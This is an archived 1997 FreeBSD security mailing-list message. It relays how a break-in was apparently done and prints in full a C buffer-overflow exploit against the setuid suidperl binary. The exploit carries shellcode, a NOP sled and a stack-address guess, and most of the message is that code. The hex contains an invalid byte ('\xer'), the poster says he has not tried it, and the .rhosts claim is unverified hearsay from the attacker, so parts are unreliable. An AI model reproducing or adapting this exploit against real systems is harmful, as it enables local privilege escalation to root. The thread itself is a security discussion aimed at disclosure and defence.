atom feed200 messages in org.freebsd.freebsd-securityRe: security hole in FreeBSD
FromSent OnAttachments
133 earlier messages
Nate WilliamsJul 29, 1997 7:19 am 
Rodney W. GrimesJul 29, 1997 8:58 am 
Warner LoshJul 29, 1997 9:25 am 
Warner LoshJul 29, 1997 9:34 am 
Christopher PetrilliJul 29, 1997 9:52 am 
Jim ShanklandJul 29, 1997 9:57 am 
John DowdalJul 29, 1997 10:50 am 
Poul-Henning KampJul 29, 1997 12:05 pm 
Bill PechterJul 29, 1997 12:29 pm 
Matthew HuntJul 29, 1997 12:37 pm 
Christopher PetrilliJul 29, 1997 12:43 pm 
[Mario1-]Jul 29, 1997 1:07 pm 
Garrett WollmanJul 29, 1997 1:07 pm 
[Mario1-]Jul 29, 1997 1:14 pm 
sth...@nethelp.noJul 29, 1997 1:39 pm 
Jordan K. HubbardJul 29, 1997 2:23 pm 
Vincent PoyJul 29, 1997 2:45 pm 
Vincent PoyJul 29, 1997 2:57 pm 
Vincent PoyJul 29, 1997 3:02 pm 
sth...@nethelp.noJul 29, 1997 3:30 pm 
Rocco LuciaJul 29, 1997 3:33 pm 
Vincent PoyJul 29, 1997 3:44 pm 
Aaron BornsteinJul 29, 1997 3:44 pm 
Vincent PoyJul 29, 1997 3:54 pm 
Vincent PoyJul 29, 1997 4:00 pm 
Jay D. NelsonJul 29, 1997 5:29 pm 
Adam ShostackJul 29, 1997 6:06 pm 
Gary SchrockJul 29, 1997 6:10 pm 
Adam ShostackJul 29, 1997 6:11 pm 
Michael SmithJul 29, 1997 6:54 pm 
Jay D. NelsonJul 29, 1997 7:58 pm 
Jay D. NelsonJul 29, 1997 8:10 pm 
Michael SmithJul 29, 1997 8:25 pm 
Marco MolteniJul 30, 1997 5:04 am 
James SengJul 30, 1997 5:31 am 
Alex G. BulushevJul 30, 1997 5:59 am 
Vincent PoyJul 30, 1997 6:45 am 
Robert WatsonJul 30, 1997 7:03 am 
Nate WilliamsJul 30, 1997 7:48 am 
Vincent PoyJul 30, 1997 7:54 am 
Nate WilliamsJul 30, 1997 8:06 am 
Nate WilliamsJul 30, 1997 8:13 am 
Vincent PoyJul 30, 1997 8:28 am 
Vincent PoyJul 30, 1997 8:33 am 
zoonieJul 30, 1997 9:09 am 
Poul-Henning KampJul 30, 1997 9:25 am 
Poul-Henning KampJul 30, 1997 9:31 am 
John-David ChildsJul 30, 1997 10:17 am 
Ian KallenJul 30, 1997 10:37 am 
Patrick GilbertJul 30, 1997 11:43 am 
Jay D. NelsonJul 30, 1997 1:52 pm 
[Mario1-]Jul 30, 1997 2:06 pm 
Jordan K. HubbardJul 30, 1997 3:53 pm 
Jordan K. HubbardJul 30, 1997 4:04 pm 
yossmanJul 30, 1997 4:20 pm 
Jordan K. HubbardJul 30, 1997 4:24 pm 
Peter KorstenJul 30, 1997 4:43 pm 
Michael SmithJul 30, 1997 8:01 pm 
Cy SchubertJul 30, 1997 9:10 pm 
FreeBSD Technical ReaderJul 30, 1997 11:18 pm 
Marco MolteniJul 31, 1997 5:24 am 
yossmanJul 31, 1997 9:00 am 
Adam ShostackJul 31, 1997 9:19 am 
Marc SlemkoJul 31, 1997 11:23 am 
AndrewAug 1, 1997 10:00 pm 
Dmitry KohmanyukAug 1, 1997 10:32 pm 
Philippe RegnauldAug 2, 1997 1:46 pm 
Subject:Re: security hole in FreeBSD
From:Patrick Gilbert (gilb@videotron.com)
Date:Jul 30, 1997 11:43:41 am
List:org.freebsd.freebsd-security

At 17:27 97-07-28 -0700, you wrote:

Just a update on how the break-in was done after the hacker was confronted on irc.

Apparently FreeBSD ships with .rhosts in the root account. Using this and perl5.00401, the user was able to rlogin onto the other machine without using a password.

After a brief discussion with TheCa on Efnet, he dcc'd me his famous exploit for a transcript of his brief moment of fame on this discussion list.

/* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl exploit by Ovx */

#include <stdio.h> #include <stdlib.h> #include <unistd.h>

#define BUFFER_SIZE 1400 #define OFFSET 600

char *get_esp(void) {

asm("movl %esp,%eax"); } char buf[BUFFER_SIZE];

main(int argc, char *argv[]) { int i; char execshell[] =

"\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"

"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"

"\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01"

"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

for(i=0+1;i<BUFFER_SIZE-4;i+=4) *(char **)&buf[i] = get_esp() - OFFSET;

memset(buf,0x90,768+1);

memcpy(&buf[768+1],execshell,strlen(execshell));

buf[BUFFER_SIZE-1]=0;

execl("/usr/bin/sperl5.00403", "/usr/bin/sperl5.00403", buf, NULL); }

I haven't had time to try it, so this may not work. Then again, he may be lying. Then again, do we really care ??

Bah.

Patrick